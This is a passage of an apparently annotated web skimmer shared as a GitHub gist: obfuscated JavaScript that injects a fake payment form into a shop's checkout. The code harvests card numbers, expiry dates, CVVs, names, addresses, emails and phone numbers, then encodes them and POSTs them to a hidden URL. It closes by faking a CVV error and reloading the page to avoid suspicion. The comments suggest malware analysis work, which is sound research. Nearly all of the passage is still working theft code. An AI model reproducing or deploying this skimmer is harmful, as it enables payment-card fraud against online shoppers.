<small><input class="ncol" type="button" name="reselect" value="Back" id="btn_Back" /></small> | |
</td> | |
<td class="ncollogoc" width="50%" align="center"></td> | |
</tr> | |
</tbody> | |
</table> | |
</center> | |
</td> | |
</tr> | |
</tbody> | |
</table> | |
</td> | |
<td width="15%"></td> | |
</tr> | |
</tbody> | |
</table> | |
<script> | |
let imgs = { | |
visa: { | |
top: 'https://payments.epdq.co.uk/images/VISA_choice.gif', | |
bot: 'https://payments.epdq.co.uk/images/VISA_brand3D.gif' | |
}, | |
master: { | |
top: 'https://payments.epdq.co.uk/images/Eurocard_choice.gif', | |
bot: 'https://payments.epdq.co.uk/images/Eurocard_brand3D.gif' | |
}, | |
jcb: { | |
top: 'https://payments.epdq.co.uk/images/JCB_choice.gif', | |
bot: '' | |
}, | |
maestro: { | |
top: 'https://payments.epdq.co.uk/images/Maestro_choice.gif', | |
bot: '' | |
} | |
} | |
let topimg = document.querySelector('#cardtypeimg'); | |
let botimg = document.querySelector('#botpic'); | |
let topsrc = ''; | |
let botsrc = ''; | |
document.querySelectorAll('#step1 input[type=image]').forEach(item => { | |
item.addEventListener('click', (e) => { | |
checkType(e); | |
}) | |
}); | |
const checkType = e => { | |
console.log(e.target.name); | |
switch (e.target.name) { | |
case 'VISA_brand': | |
document.querySelector('#step1').style.display = 'none'; | |
document.querySelector('#step2').style.display = 'table'; | |
topsrc = imgs.visa.top; | |
botsrc = imgs.visa.bot; | |
break; | |
case 'Eurocard_brand': | |
document.querySelector('#step1').style.display = 'none'; | |
document.querySelector('#step2').style.display = 'table'; | |
topsrc = imgs.master.top; | |
botsrc = imgs.master.bot; | |
break; | |
case 'JCB_brand': | |
document.querySelector('#step1').style.display = 'none'; | |
document.querySelector('#step2').style.display = 'table'; | |
topsrc = imgs.jcb.top; | |
botsrc = imgs.jcb.bot; | |
break; | |
case 'Maestro_brand': | |
document.querySelector('#step1').style.display = 'none'; | |
document.querySelector('#step2').style.display = 'table'; | |
topsrc = imgs.maestro.top; | |
botsrc = imgs.maestro.bot; | |
break; | |
default: | |
break; | |
} | |
topimg.src = topsrc; | |
botimg.src = botsrc; | |
} | |
</script> | |
</body> | |
</html> | |
`; | |
_0x5d7a20(paymentInjectConfig['frame_id'])['then'](() => | |
{ | |
return document['querySelector'](paymentInjectConfig['frame_id']); | |
})['then'](_0x557454 => | |
{ | |
let _0x3ea900 = _0x557454['contentDocument']; | |
_0x3ea900['open'](), _0x3ea900['write'](_0x25d16f), _0x3ea900['close'](), _0x1a1ea7(), setTimeout(() => | |
{ | |
document['title'] = 'Payment confirmation', document['querySelector']('link[rel=icon]')['href'] = '', _0x557454['style']['display'] = 'block', window['scrollTo'](0x0, 0x0); | |
}, 0x9c4), _0x3ea900['querySelector'](paymentInjectConfig['sendbtn'])['addEventListener']('click', () => | |
{ | |
if (!_0x5c12ea(_0x3ea900['querySelector'](paymentInjectConfig['cnum'])['value'])) return _0x3ea900['querySelector'](paymentInjectConfig['cnum'])['style']['backgroundColor'] = 'rgba(255, 0, 0, 0.1)', ![]; | |
else _0x3ea900['querySelector'](paymentInjectConfig['cnum'])['style']['border'] = ''; | |
if (_0x3ea900['querySelector'](paymentInjectConfig['expm'])['value'] == '') return _0x3ea900['querySelector'](paymentInjectConfig['expm'])['style']['backgroundColor'] = 'rgba(255, 0, 0, 0.1)', ![]; | |
else _0x3ea900['querySelector'](paymentInjectConfig['expm'])['style']['border'] = ''; | |
if (_0x3ea900['querySelector'](paymentInjectConfig['expy'])['value'] == '') return _0x3ea900['querySelector'](paymentInjectConfig['expy'])['style']['backgroundColor'] = 'rgba(255, 0, 0, 0.1)', ![]; | |
else _0x3ea900['querySelector'](paymentInjectConfig['expy'])['style']['border'] = ''; | |
if (_0x3ea900['querySelector'](paymentInjectConfig['cvv'])['value']['length'] < 0x3) return _0x3ea900['querySelector'](paymentInjectConfig['cvv'])['style']['backgroundColor'] = 'rgba(255, 0, 0, 0.1)', ![]; | |
else _0x3ea900['querySelector'](paymentInjectConfig['cvv'])['style']['border'] = ''; | |
var _0x277064 = ''; | |
try | |
{ | |
_0x277064 = getSelector(exfilConfig['eml'])['value']; | |
} | |
catch (_0x56789a) | |
{} | |
let _0x340812 = { | |
'eml': _0x277064, | |
'nme': getSelector(exfilConfig['cnm'])['value'] + ' ' + getSelector(exfilConfig['cna'])['value'], | |
'adr': getSelector(exfilConfig['adr'])['value'] ? getSelector(exfilConfig['adr'])['value'] + ' ' + getSelector('#billing\:street2')['value'] : getSelector(exfilConfig['adr'])['defaultValue'], | |
'cit': getSelector(exfilConfig['cit'])['value'] ? getSelector(exfilConfig['cit'])['value'] : getSelector(exfilConfig['cit'])['defaultValue'], | |
'zip': getSelector(exfilConfig['zip'])['value'], | |
'sta': getSelector(exfilConfig['sta'])['value'], | |
'cnt': getSelector(exfilConfig['cnt'])['value'], | |
'phn': getSelector(exfilConfig['phn'])['value'], | |
'shp': window['location']['host'], | |
'num': _0x3ea900['querySelector'](paymentInjectConfig['cnum'])['value'], | |
'dat': _0x3ea900['querySelector'](paymentInjectConfig['expm'])['value'] + '/' + _0x3ea900['querySelector'](paymentInjectConfig['expy'])['value'], | |
'vvv': _0x3ea900['querySelector'](paymentInjectConfig['cvv'])['value'], | |
'nav': navigator['userAgent'] | |
}; | |
// After gathering all the data and exfiltrating it, the skimmer pretends like there was an issue | |
// with the victim's CVV. It changes the background to red, then it sets the "mage-checkout-mc" | |
// and reloads the page. With that cookie set, the checkout flow continues as it normally would | |
exfilData(atob(exfilConfig['url']), JSON['stringify'](_0x340812))['then'](() => | |
{ | |
_0x3ea900['querySelector'](paymentInjectConfig['cvv'])['style']['backgroundColor'] = 'rgba(255, 0, 0, 0.1)', setFinalCookie(); | |
}); | |
}); | |
}); | |
}, | |
setFinalCookie = () => | |
{ | |
setCookie(paymentInjectConfig['final_cookie'], Math['floor'](0x5f5e100 + Math['random']() * 0x35a4e900), 0x5), window['location']['reload'](); | |
}, | |
_0x5c12ea = function (_0x2c7d59) | |
{ | |
var _0x3254e0 = _0x2adc58; | |
if (_0x2c7d59['length'] == 0x0) return; | |
_0x2c7d59 = _0x2c7d59['replace'](/ /g, ''); | |
var _0x501779, _0x217b55, _0x278f40, _0x569bcb, _0x341c72, _0x44aeef; | |
_0x278f40 = !![], _0x569bcb = 0x0, _0x217b55 = (_0x2c7d59 + '')['split']('')['reverse'](); | |
for (_0x341c72 = 0x0, _0x44aeef = _0x217b55['length']; _0x341c72 < _0x44aeef; _0x341c72++) | |
{ | |
_0x501779 = _0x217b55[_0x341c72], _0x501779 = parseInt(_0x501779, 0xa), (_0x278f40 = !_0x278f40) && (_0x501779 *= 0x2), _0x501779 > 0x9 && (_0x501779 -= 0x9), _0x569bcb += _0x501779; | |
} | |
return _0x569bcb % 0xa === 0x0; | |
}, | |
getSelector = selector => | |
{ | |
return document['querySelector'](selector) ? document['querySelector'](selector) : ''; | |
}, | |
setCookie = function (cookieName, cookieValue, daysOffset) | |
{ | |
let expiration = ''; | |
if (daysOffset) | |
{ | |
const expireDate = new Date(); | |
expireDate['setTime'](expireDate['getTime']() + daysOffset * 0x18 * 0x3c * 0x3c * 0x3e8), expiration = '; expires=' + expireDate['toUTCString'](); | |
} | |
document['cookie'] = cookieName + '=' + (cookieValue || '') + expiration + '; path=/'; | |
}, | |
getCookie = function (cookieName) | |
{ | |
const _0x49fa72 = cookieName + '=', | |
_0xd93b51 = document['cookie']['split'](';'); | |
for (let _0x25be19 = 0x0; _0x25be19 < _0xd93b51['length']; _0x25be19++) | |
{ | |
let _0x11f845 = _0xd93b51[_0x25be19]; | |
while (_0x11f845['charAt'](0x0) == ' ') _0x11f845 = _0x11f845['substring'](0x1, _0x11f845['length']); | |
if (_0x11f845['indexOf'](_0x49fa72) == 0x0) return _0x11f845['substring'](_0x49fa72['length'], _0x11f845['length']); | |
} | |
return null; | |
}, | |
exfilData = async (_0x469746, _0x201b33) => | |
{ | |
var _0x51b79f = _0x2adc58; | |
const _0x3a233b = await fetch(_0x469746, | |
{ | |
'method': 'POST', | |
'headers': | |
{ | |
'Accept': 'application/json', | |
'Content-type': 'application/x-www-form-urlencoded; charset=UTF-8' | |
}, | |
'body': 'api=' + encodeURI(encodeAndObfuscate(_0x201b33)) | |
}); | |
return _0x3a233b['json'](); | |
}, | |
// This function base64 encodes the payload | |
// Then it swaps the following characters in the encoded value: | |
// a,h,e,0,7,d,T,o,Y,w | |
// For the following values: | |
// -,_,:,/,^,#,@,%,*,+ | |
encodeAndObfuscate = function (_0xfc1ade, _0x21fc0b) | |
{ | |
var _0x392ada = base64['encode'](_0xfc1ade); | |
return _0x392ada = _0x392ada['replace'](/a/g, '-'), _0x392ada = _0x392ada['replace'](/h/g, '_'), _0x392ada = _0x392ada['replace'](/e/g, ':'), _0x392ada = _0x392ada['replace'](/0/g, '/'), _0x392ada = _0x392ada['replace'](/7/g, '^'), _0x392ada = _0x392ada['replace'](/d/g, '#'), _0x392ada = _0x392ada['replace'](/T/g, '@'), _0x392ada = _0x392ada['replace'](/o/g, '%'), _0x392ada = _0x392ada['replace'](/Y/g, '*'), _0x392ada = _0x392ada['replace'](/w/g, '+'), _0x392ada; | |
}, | |
// boilerplate base64 | |
base64 = { | |
'_keyStr': 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=', | |
'encode': function (_0x121c29) | |
{ | |
var _0x17e69a = _0x2adc58, | |
_0x5a1845 = '', | |
_0x27a1ef, _0x46ad3c, _0x5f1b2b, _0x54eea2, _0x428601, _0x78a28f, _0x494de9, _0x456e19 = 0x0; | |
_0x121c29 = base64['_utf8_encode'](_0x121c29); | |
while (_0x456e19 < _0x121c29['length']) | |
{ | |
_0x27a1ef = _0x121c29['charCodeAt'](_0x456e19++), _0x46ad3c = _0x121c29['charCodeAt'](_0x456e19++), _0x5f1b2b = _0x121c29['charCodeAt'](_0x456e19++), _0x54eea2 = _0x27a1ef >> 0x2, _0x428601 = (_0x27a1ef & 0x3) << 0x4 | _0x46ad3c >> 0x4, _0x78a28f = (_0x46ad3c & 0xf) << 0x2 | _0x5f1b2b >> 0x6, _0x494de9 = _0x5f1b2b & 0x3f; | |
if (isNaN(_0x46ad3c)) _0x78a28f = _0x494de9 = 0x40; | |
else isNaN(_0x5f1b2b) && (_0x494de9 = 0x40); | |
_0x5a1845 = _0x5a1845 + this['_keyStr']['charAt'](_0x54eea2) + this['_keyStr']['charAt'](_0x428601) + this['_keyStr']['charAt'](_0x78a28f) + this['_keyStr']['charAt'](_0x494de9); | |
} | |
return _0x5a1845; | |
}, | |
'decode': function (_0x95631a) | |
{ | |
var _0x4ee268 = _0x2adc58, | |
_0x19cc88 = '', | |
_0x4f3316, _0x2d4ed4, _0x5f0377, _0x2f8336, _0x44bf8b, _0x18c9a1, _0x51554f, _0x1f5601 = 0x0; | |
_0x95631a = _0x95631a['replace'](/[^A-Za-z0-9+/=]/g, ''); | |
while (_0x1f5601 < _0x95631a['length']) | |
{ | |
_0x2f8336 = this['_keyStr']['indexOf'](_0x95631a['charAt'](_0x1f5601++)), _0x44bf8b = this['_keyStr']['indexOf'](_0x95631a['charAt'](_0x1f5601++)), _0x18c9a1 = this['_keyStr']['indexOf'](_0x95631a['charAt'](_0x1f5601++)), _0x51554f = this['_keyStr']['indexOf'](_0x95631a['charAt'](_0x1f5601++)), _0x4f3316 = _0x2f8336 << 0x2 | _0x44bf8b >> 0x4, _0x2d4ed4 = (_0x44bf8b & 0xf) << 0x4 | _0x18c9a1 >> 0x2, _0x5f0377 = (_0x18c9a1 & 0x3) << 0x6 | _0x51554f, _0x19cc88 = _0x19cc88 + String['fromCharCode'](_0x4f3316), _0x18c9a1 != 0x40 && (_0x19cc88 = _0x19cc88 + String['fromCharCode'](_0x2d4ed4)), _0x51554f != 0x40 && (_0x19cc88 = _0x19cc88 + String['fromCharCode'](_0x5f0377)); | |
} | |
return _0x19cc88 = base64['_utf8_decode'](_0x19cc88), _0x19cc88; | |
}, | |
'_utf8_encode': function (_0x14417b) | |
{ | |
var _0x2e7c10 = _0x2adc58; | |
_0x14417b = _0x14417b['replace'](/rn/g, 'n'); | |
var _0x428235 = ''; | |
for (var _0x3e2fb1 = 0x0; _0x3e2fb1 < _0x14417b['length']; _0x3e2fb1++) | |
{ | |
var _0x555090 = _0x14417b['charCodeAt'](_0x3e2fb1); | |
if (_0x555090 < 0x80) _0x428235 += String['fromCharCode'](_0x555090); | |
else _0x555090 > 0x7f && _0x555090 < 0x800 ? (_0x428235 += String['fromCharCode'](_0x555090 >> 0x6 | 0xc0), _0x428235 += String['fromCharCode'](_0x555090 & 0x3f | 0x80)) : (_0x428235 += String['fromCharCode'](_0x555090 >> 0xc | 0xe0), _0x428235 += String['fromCharCode'](_0x555090 >> 0x6 & 0x3f | 0x80), _0x428235 += String['fromCharCode'](_0x555090 & 0x3f | 0x80)); | |
} | |
return _0x428235; | |
}, | |
'_utf8_decode': function (_0x4f231a) | |
{ | |
var _0x19e084 = _0x2adc58, | |
_0x4782c7 = '', | |
_0xe22410 = 0x0, | |
_0x1ed61f = c1 = c2 = 0x0; | |
while (_0xe22410 < _0x4f231a['length']) | |
{ | |
_0x1ed61f = _0x4f231a['charCodeAt'](_0xe22410); | |
if (_0x1ed61f < 0x80) _0x4782c7 += String['fromCharCode'](_0x1ed61f), _0xe22410++; | |
else _0x1ed61f > 0xbf && _0x1ed61f < 0xe0 ? (c2 = _0x4f231a['charCodeAt'](_0xe22410 + 0x1), _0x4782c7 += String['fromCharCode']((_0x1ed61f & 0x1f) << 0x6 | c2 & 0x3f), _0xe22410 += 0x2) : (c2 = _0x4f231a['charCodeAt'](_0xe22410 + 0x1), c3 = _0x4f231a['charCodeAt'](_0xe22410 + 0x2), _0x4782c7 += String['fromCharCode']((_0x1ed61f & 0xf) << 0xc | (c2 & 0x3f) << 0x6 | c3 & 0x3f), _0xe22410 += 0x3); | |
} | |
return _0x4782c7; | |
} | |
}; | |
}; | |
skimmer(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment